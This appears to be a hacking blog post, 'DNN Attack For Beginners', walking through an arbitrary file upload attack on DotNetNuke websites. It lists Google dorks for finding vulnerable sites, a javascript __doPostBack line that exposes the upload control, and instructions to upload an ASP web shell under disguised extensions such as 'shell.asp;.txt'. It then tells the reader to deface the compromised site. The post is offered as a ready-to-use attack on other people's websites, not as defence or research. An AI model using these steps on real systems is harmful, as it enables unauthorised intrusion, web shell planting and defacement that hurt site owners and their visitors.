GuidePedia

0
A+ A-

DNN Attack For Beginners By AA Team

DNNbanner-TrixsMaxter
DNNbanner-TrixsMaxter

What Is DNN ?

DNN stands for Dot Net Nuke. It have an remote arbitrary File Upload vulnerability. simply said iploading
vulnerrability.

Finding vulnerable websites
Find vulnerable websites by GOOGLE dorks :
inurl:/fck/fcklinkgallery.aspx
inurl:/tabid/36/language/en-US/Default.aspx

I got a target

TrixsMaxter

Select "File" from list.
The in url bar paste the javascript ;
javascript:__doPostBack('ctlURL$cmdUpload','')
Now there appear a uploading bar on page. As seen be below :

TrixsMaxter

Now upload your ASP shell as "shell.asp;.txt , shell.asp;.jpg"
your uploads will go to "http://www.site.com/Portals/0/shell.asp;.txt"
TrixsMaxter

Now  you have a Shell Access to the website . Now deface the website.
Hope You Enjoy....!

Posted by
Share to:

Post a Comment

Thanks For Your Feed Back

Emoticon
:) :)) ;(( :-) =)) ;( ;-( :d :-d @-) :p :o :>) (o) [-( :-? (p) :-s (m) 8-) :-t :-b b-( :-# =p~ $-) (b) (f) x-) (k) (h) (c) cheer
Click to see the code!
To insert emoticon you must added at least one space before the code.

Subscribe to: Post Comments (Atom)
 
Top